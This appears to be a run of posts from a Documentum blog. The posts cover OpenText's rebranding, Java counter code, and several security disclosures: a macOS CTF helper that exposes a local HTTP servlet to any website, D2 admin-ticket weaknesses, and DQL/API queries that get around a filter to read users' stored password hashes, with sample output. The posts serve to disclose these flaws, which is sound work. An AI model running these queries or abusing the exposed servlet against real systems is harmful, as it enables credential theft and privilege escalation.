Software company vs Apache License

Pro Documentum

A month ago I got impressed how software company manages knowledge: as all we know when Documentum was under EMC wing there were two public forums: Documentum Support Forum and Documentum Developer Forum – both are inaccessible for now because OpenText had partially moved their content to OpenText community forum and restricted access to customers only – here I have now idea why do they think that ECN forums weren’t public:

At ECD, the two forums you mentioned were separated because one was an open forum and the other (Dev) was closed and available to developers only. Here, we do not have the distinction of open and closed forums within our product membership.

Today I got another interesting case: it seems that OpenText decided to rebrand Documentum products but doing it in extremely weird manner, for example:

View original post

Opentext Documentum is coming next month

Alvaro de Andres' Blog

I didn’t realize that roadmap documents were updated last month. It looks like the February release is still going to happen (and I’ve been told a definite date, so it looks it won’t be delayed). After reviewing them (haven’t seen any changes :D), I can say:

  • Not much features regarding CS, the pattern/usage visualization and the s3 support (which, as far as I know, can be already done without official support) are the new features.
  • No word about DFS, and I know for a fact that several customers have actively asked for updates to current libs and extended support for application servers.
  • Clients get barely any changes (D2, Webtop, xCP).

I’m curious to see how many bugs are found in this first release from Opentext (and the brave customers that go first into the unknown :D), considering that some of the experienced Documentum staff left the company and the changes…

View original post 19 more words

CTF, you fucked

I’m not sure about CTF for Windows, but no doubts CTF for MacOS is a piece of dog crap. How CTF works on MacOS: it installs, which is actually a HTTP-server which is listening on 13800/tcp:

Andreys-MacBook-Pro:~ apanfilov$ cat /Applications/ 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
Andreys-MacBook-Pro:~ apanfilov$ ps -ef | grep CTFHTTPServer
  501 67706     1   0  1:21am ??         0:06.77 /Applications/ -psn_0_9234638
  501 67707 67706   0  1:21am ??         0:00.87 /Applications/ -psn_0_9234638
  501 71255 69468   0  3:50am ttys007    0:00.00 grep CTFHTTPServer
Andreys-MacBook-Pro:~ apanfilov$ lsof -i -n -P | grep 13800
CTFHTTPSe 67706 apanfilov   10u  IPv4 0x4bfdf3517d667f4d      0t0    TCP (LISTEN)
Andreys-MacBook-Pro:~ apanfilov$ 

and as result we have:

Simple echo servlet:

 * @author Andrey B. Panfilov <>
public class EchoServlet extends HttpServlet implements Servlet {

	protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
		String name = req.getParameter("filename");
		byte[] content = req.getParameter("content").getBytes();
		resp.setHeader("Content-type", "application/octet-stream");
		resp.setHeader("Content-Disposition", "attachment; filename*=UTF-8''" + Rfc5987Util.encode(name));


That is to say if you have CTF installed any internet site may upload/download arbitrary information to/from your computer.

Why exposing administrative interfaces is a bad idea

After Alvaro’s blogpost I wanted to write something like: “Hey, you have missed something: you can create c6_method_return object, execute D2GetAdminTicketMethod, get encrypted admin’s ticket and use it as a password (fuck yeah, I have failed to solve this puzzle: what was the point to encrypt ticket in D2GetAdminTicketMethod if D2 servlets accept both encrypted and unencrypted passwords)”. Unfortunately, D2GetAdminTicketMethod is not a part of D2 installation anymore (it seems that talented team has at least one member who can read). Do you think it is an end of D2 disclosures? No, it is just a beginning.

Eradication of Illiteracy

What talented team had defined as “the information to retrieve” has a special name: projection, and, for most relational databases, names of attributes, presented in projection, are case-insensitive.

It seems that some members of talented team think that they are smart enough to read this blog and make some conclusions about security:

API> ?,c,select user_password from dm_user where user_name=USER
(1 row affected)

API> ?,c,select * from (select user_password from dm_user where user_name=USER)
(1 row affected)

But all their attempts are doomed to failure:

API> ?,c,select USER_PASSWORD from dm_user where user_name=USER
AAAAEAjkr5it6wBqYfLetO/ob9j+75axyTIlb6WpnS8vLcP58ppmenSigXCm4pT1Q3nG ...

API> readquery,c,select * from (select * from dm_user where user_name=USER)
API> next,c,q0
API> get,c,q0,user_password
AAAAEAjkr5it6wBqYfLetO/ob9j+75axyTIlb6WpnS8vLcP58ppmenSigXCm4pT1Q3nGK ...

Surprise: Documentum loses data

I’m not sure whether it is a common practice, but all Documentum projects I have participated in, have the following requirement: every document, created in repository, must have unique human-readable identifier, which business users may refer in their daily activities, extra requirements could be:

  • identifiers are sequential
  • there should no holes in sequence
  • sequence starts from the beginning on every new day/week/month/year

and, depending on the requirements, implementation could be either optimistic:

private int getAnnualNextNumber(ICounter counter)
        throws DfException {
    DfException resultException = null;
    for (int i = 0; i < 10; i++) {
        try {
            synchronized (CounterService.class) {
                int lastNumber = counter.getLastNumber() + 1;
                return lastNumber;
        } catch (DfException dfe) {
            resultException = dfe;
            // neither fetch nor revert is required because DFC
            // resets object's state in
            // com.documentum.fc.client.DfSysObject#doSave
            // counter.fetch(null);
    throw resultException;

or pessimistic:

private int getAnnualNextNumber(ICounter counter)
    throws DfException {
    synchronized (CounterService.class) {
        int lastNumber = counter.getLastNumber() + 1;
        return lastNumber;

Interesting thing here is in case of optimistic implementation we observe that our code generates duplicates, from audit perspective it looks like CS does not receive updated value from DFC:

Q & A. XVI

I will work, maybe, in a D2 implementation project that could be released in a public site. I do not have updated information regarding D2 4.7 security holes: I need an independent point of view and you are probably the only person that has a clear understanding of what I am talking. Can you help me to understand what has not yet been fixed just in the D2 layer?

Current D2 security status: any authenticated user may gain superuser privileges 🙂